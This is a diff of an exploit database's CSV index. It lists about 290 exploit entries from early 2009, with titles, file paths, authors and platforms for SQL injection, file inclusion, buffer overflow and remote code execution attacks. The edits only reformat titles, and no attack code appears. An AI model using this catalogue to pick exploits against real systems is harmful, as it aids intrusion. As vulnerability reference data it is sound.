8018,platforms/php/webapps/8018.txt,"FlexCMS (catId) Remote SQL Injection Vulnerability",2009-02-09,MisterRichard,php,webapps,0 @@ -7549,9 +7549,9 @@ id,file,description,date,author,platform,type,port 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC <= 0.1.0 - Local File Inclusion Vulnerability",2009-02-09,Kacper,php,webapps,0 8021,platforms/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service Exploit",2009-02-09,"Praveen Darshanam",multiple,dos,0 8022,platforms/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass",2009-02-09,ikki,hardware,remote,0 -8023,platforms/hardware/remote/8023.txt,"ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability",2009-02-09,ikki,hardware,remote,0 +8023,platforms/hardware/remote/8023.txt,"ZeroShell <= 1.0beta11 - Remote Code Execution Vulnerability",2009-02-09,ikki,hardware,remote,0 8024,platforms/windows/dos/8024.py,"TightVNC Authentication Failure Integer Overflow PoC",2009-02-09,desi,windows,dos,0 -8025,platforms/php/webapps/8025.txt,"webframe 0.76 Multiple File Inclusion Vulnerabilities",2009-02-09,ahmadbady,php,webapps,0 +8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion Vulnerabilities",2009-02-09,ahmadbady,php,webapps,0 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 config[installdir] Remote File Inclusion Vulnerability",2009-02-09,ahmadbady,php,webapps,0 8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability",2009-02-09,bd0rk,php,webapps,0 8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 (LFI) Remote Command Execution Exploit",2009-02-09,Osirys,php,webapps,0 @@ -7565,7 +7565,7 @@ id,file,description,date,author,platform,type,port 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 FD / SQL Injection Command Execution Exploit",2009-02-10,Osirys,php,webapps,0 8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit",2009-02-10,Lolek,php,webapps,0 -8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 Remote Shell Upload Vulnerability",2009-02-11,ZoRLu,php,webapps,0 +8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Remote Shell Upload Vulnerability",2009-02-11,ZoRLu,php,webapps,0 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities",2009-02-11,x0r,php,webapps,0 8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System (geohttpserver) DT Vuln",2009-02-11,"Dejan Levaja",windows,remote,0 8042,platforms/php/webapps/8042.txt,"dacio's cms 1.08 (xss/sql/dd) Multiple Vulnerabilities",2009-02-11,"Mehmet Ince",php,webapps,0 @@ -7579,14 +7579,14 @@ id,file,description,date,author,platform,type,port 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 (id) Remote SQL Injection Vulnerability",2009-02-13,JIKO,php,webapps,0 8051,platforms/hardware/dos/8051.html,"Nokia N95-8 browser (setAttributeNode) Method Crash Exploit",2009-02-13,"Juan Yacubian",hardware,dos,0 8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with RFI (c99) Exploit",2009-02-13,bd0rk,php,webapps,0 -8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 Remote FD / SQL Injection Exploit",2009-02-13,Osirys,php,webapps,0 +8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote FD / SQL Injection Exploit",2009-02-13,Osirys,php,webapps,0 8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 (info.php item) SQL Command Injection Exploit",2009-02-13,Osirys,php,webapps,0 8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE Telnet Daemon Local Privilege Escalation Exploit",2009-02-16,kingcope,freebsd,local,0 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 Persistent XSS Vulnerability",2009-02-16,rAWjAW,php,webapps,0 8058,platforms/windows/dos/8058.pl,"TPTEST <= 3.1.7 Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0 8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0 -8061,platforms/php/webapps/8061.pl,"simplePMS CMS <= 0.1.4 LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0 +8061,platforms/php/webapps/8061.pl,"simplePms CMS <= 0.1.4 LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b (sql/xss) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 8063,platforms/php/webapps/8063.txt,"novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 8064,platforms/php/webapps/8064.pl,"MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0 @@ -7596,22 +7596,22 @@ id,file,description,date,author,platform,type,port 8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0 8069,platforms/php/webapps/8069.txt,"Grestul 1.x Auth Bypass by Cookie SQL Injection Vulnerability",2009-02-16,x0r,php,webapps,0 8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System Remote Shell Upload Vulnerability",2009-02-17,ZoRLu,asp,webapps,0 -8071,platforms/php/webapps/8071.txt,"S-Cms 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns",2009-02-17,x0r,php,webapps,0 +8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns",2009-02-17,x0r,php,webapps,0 8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 (header.php mod) SQL Injection Vulnerability",2009-02-17,x0r,php,webapps,0 8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 (genbackup.php) Database Disclosure Vulnerability",2009-02-17,x0r,php,webapps,0 8074,platforms/multiple/local/8074.rb,"Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (meta)",2009-02-18,sh2kerr,multiple,local,0 8075,platforms/php/webapps/8075.pl,"Firepack (admin/ref.php) Remote Code Execution Exploit",2009-02-18,Lidloses_Auge,php,webapps,0 8076,platforms/php/webapps/8076.txt,"smNews 1.0 Auth Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0 -8077,platforms/windows/dos/8077.html,"MS Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0 -8079,platforms/windows/remote/8079.html,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0 -8080,platforms/windows/remote/8080.py,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 -8082,platforms/windows/remote/8082.html,"MS Internet Explorer 7 - Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0 +8077,platforms/windows/dos/8077.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002)",2009-02-18,N/A,windows,dos,0 +8079,platforms/windows/remote/8079.html,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (XP SP2)",2009-02-20,Abysssec,windows,remote,0 +8080,platforms/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (py)",2009-02-20,"David Kennedy (ReL1K)",windows,remote,0 +8082,platforms/windows/remote/8082.html,"Microsoft Internet Explorer 7 - Memory Corruption PoC (MS09-002) (win2k3sp2)",2009-02-20,webDEViL,windows,remote,0 8083,platforms/php/webapps/8083.txt,"phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 (t00t) Remote Denial of Service Exploit",2009-02-20,LiquidWorm,windows,dos,0 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0 -8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x (admin.txt) File Disclosure Vulnerability",2009-02-20,Pouya_Server,php,webapps,0 +8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - (admin.txt) File Disclosure Vulnerability",2009-02-20,Pouya_Server,php,webapps,0 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - (id) SQL Command Injection Exploit",2009-02-20,Osirys,php,webapps,0 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow PoC",2009-02-23,webDEViL,windows,dos,0 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 (BODY onload) Remote Crash Exploit",2009-02-23,Skylined,multiple,dos,0 @@ -7619,13 +7619,13 @@ id,file,description,date,author,platform,type,port 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 (notes.php id) Remote Command Execution Exploit",2009-02-23,JosS,php,webapps,0 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 LFI Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 LFI Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 -8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router SMS XSS Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0 +8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router Sms XSS Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0 8097,platforms/multiple/remote/8097.txt,"MLdonkey <= 2.9.7 HTTP DOUBLE SLASH Arbitrary File Disclosure Vuln",2009-02-23,"Michael Peselnik",multiple,remote,0 8098,platforms/php/webapps/8098.txt,"taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability",2009-02-23,K-159,php,webapps,0 8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2) (0day)",2009-02-23,"Guido Landi",windows,dos,0 8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery (pid) Remote SQL Injection Exploit",2009-02-23,StAkeR,php,webapps,0 8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-02-24,Fireshot,php,webapps,0 -8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x Remote Buffer Overflow PoC",2009-02-24,M4rt1n,windows,dos,0 +8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow PoC",2009-02-24,M4rt1n,windows,dos,0 8104,platforms/php/webapps/8104.txt,"Qwerty CMS (id) Remote SQL Injection Vulnerability",2009-02-24,b3,php,webapps,0 8105,platforms/php/webapps/8105.txt,"ppim 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 - Wireless Router Get Request Denial of Service Vuln",2009-02-25,staticrez,hardware,dos,0 @@ -7647,7 +7647,7 @@ id,file,description,date,author,platform,type,port 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1B Multiple Vulnerabilities and Exploit",2009-02-27,Osirys,php,webapps,0 8125,platforms/hardware/dos/8125.rb,"HTC Touch vCard over IP Denial of Service Exploit",2009-03-02,"Mobile Security Lab",hardware,dos,0 8126,platforms/windows/local/8126.py,"Merak Media PLayer 3.2 m3u File Local Buffer Overflow Exploit (SEH)",2009-03-02,"Encrypt3d.M!nd ",windows,local,0 -8127,platforms/php/webapps/8127.txt,"blogman 0.45 Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 +8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b Delete All Posts / SQL Injection Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8129,platforms/windows/dos/8129.pl,"Novell eDirectory iMonitor (Accept-Language) Request BOF PoC",2009-03-02,"Praveen Darshanam",windows,dos,0 8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 Arbitrary Change Admin Vulnerability",2009-03-02,ByALBAYX,asp,webapps,0 @@ -7670,7 +7670,7 @@ id,file,description,date,author,platform,type,port 8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0 8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability",2009-03-03,Pepelux,php,webapps,0 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability",2009-03-03,kecemplungkalen,php,webapps,0 -8152,platforms/windows/remote/8152.py,"MS Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Fast)",2009-03-04,"Ahmed Obied",windows,remote,0 +8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Fast)",2009-03-04,"Ahmed Obied",windows,remote,0 8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)",2009-03-04,Dr4sH,windows,remote,80 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure Vulnerability",2009-03-04,Stack,windows,remote,0 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0 @@ -7698,7 +7698,7 @@ id,file,description,date,author,platform,type,port 8180,platforms/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow PoC (SEH)",2009-03-09,"fl0 fl0w",windows,dos,0 8181,platforms/php/webapps/8181.c,"PHP Director <= 0.21 (sql into outfile) eval() Injection Exploit",2009-03-09,StAkeR,php,webapps,0 8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability",2009-03-09,d3b4g,php,webapps,0 -8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0 +8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability",2009-03-09,netsoul,php,webapps,0 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability",2009-03-09,elusiven,php,webapps,0 @@ -7709,12 +7709,12 @@ id,file,description,date,author,platform,type,port 8191,platforms/multiple/remote/8191.txt,"NextApp Echo < 2.1.1 XML Injection Vulnerability",2009-03-10,"SEC Consult",multiple,remote,0 8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 (playlist) Universal SEH Overwrite Exploit",2009-03-10,His0k4,windows,local,0 8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel (course_id) SQL Injection Vulnerability",2009-03-10,SuB-ZeRo,php,webapps,0 -8195,platforms/php/webapps/8195.txt,"WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities",2009-03-10,K-159,php,webapps,0 +8195,platforms/php/webapps/8195.txt,"WeBid <= 0.7.3 RC9 - Multiple Remote File Inclusion Vulnerabilities",2009-03-10,K-159,php,webapps,0 8196,platforms/php/webapps/8196.txt,"Wordpress MU < 2.7 'HOST' HTTP Header XSS Vulnerability",2009-03-10,"Juan Galiana Lara",php,webapps,0 8197,platforms/php/webapps/8197.txt,"Joomla Djice Shoutbox 1.0 Permanent XSS Vulnerability",2009-03-10,XaDoS,php,webapps,0 8198,platforms/php/webapps/8198.pl,"RoomPHPlanning <= 1.6 (userform.php) Create Admin User Exploit",2009-03-10,"Jonathan Salwan",php,webapps,0 -8200,platforms/windows/remote/8200.pl,"GuildFTPd FTP Server 0.999.14 Remote Delete Files Exploit",2009-03-10,"Jonathan Salwan",windows,remote,0 -8201,platforms/windows/local/8201.pl,"Foxit Reader <= 3.0 (Build 1301) - PDF Buffer Overflow Exploit (Univ.)",2009-03-13,SkD,windows,local,0 +8200,platforms/windows/remote/8200.pl,"GuildFTPd FTP Server 0.999.14 - Remote Delete Files Exploit",2009-03-10,"Jonathan Salwan",windows,remote,0 +8201,platforms/windows/local/8201.pl,"Foxit Reader <= 3.0 (Build 1301) - PDF Buffer Overflow Exploit (Univ.)",2009-03-13,SkD,windows,local,0 8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - (Cookie) Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0 8203,platforms/windows/remote/8203.pl,"POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit",2009-03-12,"Jeremy Brown",windows,remote,0 8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 (xss/sql) Multiple Vulnerabilities",2009-03-12,XaDoS,php,webapps,0 @@ -7736,17 +7736,17 @@ id,file,description,date,author,platform,type,port 8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow PoC",2009-03-16,Stack,windows,dos,0 8225,platforms/windows/dos/8225.py,"Gretech GOM Encoder 1.0.0.11 (Subtitle File) Buffer Overflow PoC",2009-03-16,"Encrypt3d.M!nd ",windows,dos,0 8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 (SearchOption) Blind SQL Injection Vulnerability",2009-03-17,BugReport.IR,php,webapps,0 -8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 Remote Stack Overflow Exploit (SEH)",2009-03-17,LiquidWorm,windows,remote,0 -8228,platforms/php/webapps/8228.txt,"GDL 4.x (node) Remote SQL Injection Vulnerability",2009-03-17,g4t3w4y,php,webapps,0 +8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow Exploit (SEH)",2009-03-17,LiquidWorm,windows,remote,0 +8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) Remote SQL Injection Vulnerability",2009-03-17,g4t3w4y,php,webapps,0 8229,platforms/php/webapps/8229.txt,"Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability",2009-03-17,"strange kevin",php,webapps,0 8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability",2009-03-17,Garry,php,webapps,0 8231,platforms/windows/local/8231.php,"CDex 1.70b2 (.ogg) Local Buffer Overflow Exploit (xp/ sp3)",2009-03-18,Nine:Situations:Group,windows,local,0 8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - (.pls) Local Buffer Overflow PoC (SEH)",2009-03-18,zAx,windows,dos,0 -8233,platforms/windows/local/8233.py,"Chasys Media Player 1.1 - (.pls) Local Stack overflow Exploit",2009-03-18,His0k4,windows,local,0 +8233,platforms/windows/local/8233.py,"Chasys Media Player 1.1 - (.pls) Local Stack Overflow Exploit",2009-03-18,His0k4,windows,local,0 8234,platforms/windows/local/8234.py,"Chasys Media Player 1.1 - (.pls) Stack Overflow Exploit (2)",2009-03-18,"Encrypt3d.M!nd ",windows,local,0 8235,platforms/windows/local/8235.py,"Chasys Media Player 1.1 - (.m3u) Stack Overflow Exploit",2009-03-18,"Encrypt3d.M!nd ",windows,local,0 8236,platforms/windows/local/8236.py,"Icarus 2.0 (.PGN File) Local Stack Overflow Exploit (SEH)",2009-03-18,His0k4,windows,local,0 -8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 +8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln",2009-03-18,boom3rang,php,webapps,0 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Remote Arbitrary File Deletion Vulnerability",2009-03-18,"Alfons Luja",php,webapps,0 8240,platforms/php/webapps/8240.txt,"DeluxeBB <= 1.3 (qorder) Remote SQL Injection Vulnerability",2009-03-18,girex,php,webapps,0 @@ -7754,7 +7754,7 @@ id,file,description,date,author,platform,type,port 8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 - .cue File Stack Overflow Exploit",2009-03-19,Stack,windows,local,0 8243,platforms/php/webapps/8243.txt,"bloginator 1a - (cookie bypass/sql) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Command Injection via Cookie Bypass Exploit",2009-03-19,Fireshot,php,webapps,0 -8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x Remote Denial of Service Exploit",2009-03-19,"Jonathan Salwan",multiple,dos,0 +8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service Exploit",2009-03-19,"Jonathan Salwan",multiple,dos,0 8246,platforms/windows/local/8246.pl,"Chasys Media Player - (.lst playlist) Local Buffer Overflow Exploit",2009-03-19,zAx,windows,local,0 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server Command Execution Vulnerability (post auth)",2009-03-19,"Emory University",cgi,webapps,0 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 (From) Remote Buffer Overflow Exploit (SEH)",2009-03-20,His0k4,windows,remote,0 @@ -7762,7 +7762,7 @@ id,file,description,date,author,platform,type,port 8250,platforms/windows/local/8250.txt,"CloneCD/DVD (ElbyCDIO.sys < 6.0.3.2) Local Privilege Escalation Exploit",2009-03-20,"NT Internals",windows,local,0 8251,platforms/windows/local/8251.py,"BS.Player 2.34 (.bsl) Universal SEH Overwrite Exploit",2009-03-20,His0k4,windows,local,0 8252,platforms/php/webapps/8252.txt,"pixie cms (xss/sql) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 -8253,platforms/windows/remote/8253.c,"Racer 0.5.3b5 Remote Stack Buffer Overflow Exploit",2009-03-20,"fl0 fl0w",windows,remote,0 +8253,platforms/windows/remote/8253.c,"Racer 0.5.3b5 - Remote Stack Buffer Overflow Exploit",2009-03-20,"fl0 fl0w",windows,remote,0 8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 (UserGallery) Blind SQL Injection Exploit",2009-03-23,Invisibility,php,webapps,0 8255,platforms/php/webapps/8255.txt,"SuperNews 1.5 (valor.php noticia) SQL Injection Vulnerability",2009-03-23,p3s0k!,php,webapps,0 8256,platforms/windows/remote/8256.c,"Sysax Multi Server 4.3 - Remote Arbitrary Delete Files Exploit",2009-03-23,"Jonathan Salwan",windows,remote,0 @@ -7781,18 +7781,18 @@ id,file,description,date,author,platform,type,port 8269,platforms/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote,0 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 Local Buffer Overflow Exploit",2009-03-23,Koshi,windows,local,0 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit",2009-03-23,"Alfons Luja",php,webapps,0 -8272,platforms/php/webapps/8272.pl,"Codice CMS 2 Remote SQL Command Execution Exploit",2009-03-23,darkjoker,php,webapps,0 +8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - Remote SQL Command Execution Exploit",2009-03-23,darkjoker,php,webapps,0 8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Multiple Vulnerabilities (Post Auth)",2009-03-23,"Jonathan Salwan",windows,remote,0 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 .eml file Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 .html file Universal SEH Overwrite Exploit",2009-03-23,Stack,windows,local,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 LFI/SQL Command Injection Exploit",2009-03-23,Osirys,php,webapps,0 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 Auth Bypass (SQL) / Upload Shell Vulnerabilities",2009-03-23,Mr.Skonnie,php,webapps,0 8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox <= 2.8 (name) Local File Inclusion Vulnerability",2009-03-24,dun,php,webapps,0 -8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b - C1 HFP1 Remote Privilege Escalation Vulnerability",2009-03-24,Nine:Situations:Group,php,webapps,0 +8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b - C1 HFP1 - Remote Privilege Escalation Vulnerability",2009-03-24,Nine:Situations:Group,php,webapps,0 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus EMF GpFont.SetData Integer Overflow PoC",2009-03-24,"Black Security",windows,dos,0 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 (view.php id) SQL Injection Vulnerability",2009-03-24,x0r,php,webapps,0 -8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x Multiple Vulnerabilities (post auth)",2009-03-24,"Jonathan Salwan",windows,remote,0 +8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Multiple Vulnerabilities (post auth)",2009-03-24,"Jonathan Salwan",windows,remote,0 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 (XSS) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (0day)",2009-03-25,"Guido Landi",multiple,dos,0 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Arbitrary File Upload Exploit",2009-03-25,EgiX,php,webapps,0 @@ -7807,14 +7807,14 @@ id,file,description,date,author,platform,type,port 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script (username) Static XSS Vulnerability",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 File Disclosure Vulnerability",2009-03-27,"Christian J. Eibl",php,webapps,0 8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 (LFI) Remote Command Execution Exploit",2009-03-27,Osirys,php,webapps,0 -8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 (CMP File) Stack overflow Exploit",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 +8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 (CMP File) Stack Overflow Exploit",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 (hhp File) Stack Overflow poC",2009-03-27,"Encrypt3d.M!nd ",windows,dos,0 8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit",2009-03-29,LiquidWorm,windows,local,0 8302,platforms/php/webapps/8302.php,"glFusion <= 1.1.2 COM_applyFilter()/order SQL Injection Exploit",2009-03-29,Nine:Situations:Group,php,webapps,0 8303,platforms/linux/local/8303.c,"pam-krb5 < 3.13 Local Privilege Escalation Exploit",2009-03-29,"Jon Oberheide",linux,local,0 8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script (Auth Bypass) Insecure Cookie Handling Vuln",2009-03-29,ZoRLu,php,webapps,0 8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple Remote SQL Injection Vulnerabilities",2009-03-29,boom3rang,php,webapps,0 -8306,platforms/windows/dos/8306.txt,"Firefox 3.0.x (XML Parser) Memory Corruption / DoS PoC",2009-03-30,"Wojciech Pawlikowski",windows,dos,0 +8306,platforms/windows/dos/8306.txt,"Firefox 3.0.x - (XML Parser) Memory Corruption / DoS PoC",2009-03-30,"Wojciech Pawlikowski",windows,dos,0 8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager (SQL/DB/Auth Bypass) Multiple Vulnerabilities",2009-03-30,AnGeL25dZ,asp,webapps,0 8308,platforms/multiple/dos/8308.c,"Wireshark <= 1.0.6 PN-DCP Format String Exploit PoC",2009-03-30,"THCX Labs",multiple,dos,0 8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 (members.php memid) SQL Injection Vulnerability",2009-03-30,SirGod,php,webapps,0 @@ -7823,7 +7823,7 @@ 